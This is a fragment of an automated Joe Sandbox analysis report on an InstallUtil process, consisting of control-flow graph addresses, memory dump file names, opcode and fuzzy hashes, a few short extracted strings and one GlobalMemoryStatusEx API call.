                                                            control_flow_graph 3305 5a9e098-5a9e0a3 3306 5a9e0cd-5a9e0e0 3305->3306 3307 5a9e0a5-5a9e0cc call 5a9d23c 3305->3307 3311 5a9e0e3-5a9e0ec call 5a9d248 3306->3311 3314 5a9e0ee-5a9e0f1 3311->3314 3315 5a9e0f2-5a9e130 3311->3315 3315->3311 3320 5a9e132-5a9e151 3315->3320 3322 5a9e153-5a9e156 3320->3322 3323 5a9e157-5a9e1e4 GlobalMemoryStatusEx 3320->3323 3327 5a9e1ed-5a9e215 3323->3327 3328 5a9e1e6-5a9e1ec 3323->3328 3328->3327
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3294367754.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_5a90000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b724ad8da440ee405723f82f40a24ced6d912844c2f0fe96531eb22f60a7a8bd
                                                            • Instruction ID: 7d124538b3849c3495d3f863f4b162b73d99240060a28a9b44e05c0f01310087
                                                            • Opcode Fuzzy Hash: b724ad8da440ee405723f82f40a24ced6d912844c2f0fe96531eb22f60a7a8bd
                                                            • Instruction Fuzzy Hash: 81412672D043698BCB04DF69D844BAEBBF5AF89210F14856AD414A7341DB789885CBD0

                                                            Control-flow Graph

                                                            control_flow_graph 3331 5a9d248-5a9e1e4 GlobalMemoryStatusEx 3334 5a9e1ed-5a9e215 3331->3334 3335 5a9e1e6-5a9e1ec 3331->3335 3335->3334
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05A9E0EA), ref: 05A9E1D7
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3294367754.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_5a90000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID:
                                                            • API String ID: 1890195054-0
                                                            • Opcode ID: 2a232d82cb8cfec3d6274be18c9ff2640e3a3b0670b8377071562a7e5e219e80
                                                            • Instruction ID: a86b1f92419feea8684fe8e9b6616a78febde47919d813a811903d60bea05829
                                                            • Opcode Fuzzy Hash: 2a232d82cb8cfec3d6274be18c9ff2640e3a3b0670b8377071562a7e5e219e80
                                                            • Instruction Fuzzy Hash: A11106B1C046699BCB14DF9AC844B9EFBF8EB48310F14816AE814A7241D779A944CFA5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \Vl
                                                            • API String ID: 0-682378881
                                                            • Opcode ID: 368a7ba1f32f1289d10f5b5153e7d42f37e1d7ed683e58adca7fbe39e0c94a1f
                                                            • Instruction ID: 34bcb240e6008187332cc26d4ba0c9096441bba083c8407e2e84c5657d1ceb64
                                                            • Opcode Fuzzy Hash: 368a7ba1f32f1289d10f5b5153e7d42f37e1d7ed683e58adca7fbe39e0c94a1f
                                                            • Instruction Fuzzy Hash: 059171B0E00249DFDF14CFA9C9857DEBBF2BF48314F248129E915A7294DB749986CB81
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PHeq
                                                            • API String ID: 0-2873676430
                                                            • Opcode ID: 6cfc26043b59291815c4b90354f519613de81287a9991b60c55ad7b79c78851c
                                                            • Instruction ID: 5732756ff67db772b665c6a653ddbf81bdc9b7c9790ddaac3f160d484bfce1b8
                                                            • Opcode Fuzzy Hash: 6cfc26043b59291815c4b90354f519613de81287a9991b60c55ad7b79c78851c
                                                            • Instruction Fuzzy Hash: B131E070B002058FDB25AB34D95466F3BA2AB89310F24457CD406DB799EE39CD87CB90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PHeq
                                                            • API String ID: 0-2873676430
                                                            • Opcode ID: 29c8a458646cc5b88177f63d8fdbe983d4d2e3c75a358b7fd9b5639f1ed27a50
                                                            • Instruction ID: b263ad9a0086ac0ee8c4bffae5a8291591c045fa12411321da87edba63950296
                                                            • Opcode Fuzzy Hash: 29c8a458646cc5b88177f63d8fdbe983d4d2e3c75a358b7fd9b5639f1ed27a50
                                                            • Instruction Fuzzy Hash: 3A31CD30B002058BCB25AF34D95466F7BA3AB85340B24847CD406DB399EE39DD86CBD5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LReq
                                                            • API String ID: 0-2687900687
                                                            • Opcode ID: 5322a8ad1cf63e56761306b6d357d21161a8ecbe9f1a7bbc0f13004c0dbe6f81
                                                            • Instruction ID: c4e80108f4e6fe696958488e8ae981a221b9caeb6fdc01a058bf320696612a75
                                                            • Opcode Fuzzy Hash: 5322a8ad1cf63e56761306b6d357d21161a8ecbe9f1a7bbc0f13004c0dbe6f81
                                                            • Instruction Fuzzy Hash: A3317070E1020ACBDB24CFA5D54479EB7B5FF95310F21852AE415EB280E7B5ED55CB40
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LReq
                                                            • API String ID: 0-2687900687
                                                            • Opcode ID: 9827f2c35930438ee60a5140ad8b1a8ea80ebd4b7a85d80e34c24f883c41e1d6
                                                            • Instruction ID: 51fd549df4f2b5261bc7ba2338f986f423ed2cb56067341beb3038120f7fe215
                                                            • Opcode Fuzzy Hash: 9827f2c35930438ee60a5140ad8b1a8ea80ebd4b7a85d80e34c24f883c41e1d6
                                                            • Instruction Fuzzy Hash: DF2102303041448FCB26BF3CD41A7EE7BB2EF86710F1048AAD549CB296EA358D56C781
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 48097485e0cf1d5914f5dee057a9c24401e7746b2be844eb619dcd0fdec6f77d
                                                            • Instruction ID: f4ba9ab8b4aea4d541b8387b53027dfd83a247c4abe1d065051c4334872d279f
                                                            • Opcode Fuzzy Hash: 48097485e0cf1d5914f5dee057a9c24401e7746b2be844eb619dcd0fdec6f77d
                                                            • Instruction Fuzzy Hash: 8D219231A002158FCF21ABF884413AEB7B5EB44314F19047AE815EB292EB35DE42DB91
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 55412d42525938f22de26cd70679381afbdd4124bb8017c51e25bc3c584e9103
                                                            • Instruction ID: f3ac63f540d97218e16d9ef058a3bb667972600af9a39ef8ecfe6e35b2b646dc
                                                            • Opcode Fuzzy Hash: 55412d42525938f22de26cd70679381afbdd4124bb8017c51e25bc3c584e9103
                                                            • Instruction Fuzzy Hash: 34219231E046059BDB08CFA4D590BDEB7B1EF99310F11C52AE825BB3D1EB709942CB50
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2c03bef993a19e69dfdc02a38a35f342a1f76d6086fe0f49f58bd22e63750906
                                                            • Instruction ID: b7016ad0cf178b7f45f67a355f0e7be3697eca9e5963c2fa5eccc592d0c6564d
                                                            • Opcode Fuzzy Hash: 2c03bef993a19e69dfdc02a38a35f342a1f76d6086fe0f49f58bd22e63750906
                                                            • Instruction Fuzzy Hash: 5721DA70A442009BEF366768E44872DB751DB23721F480C2AE816D76F1EB29DE86C756
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3284376263.000000000079D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0079D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_79d000_InstallUtil.jbxd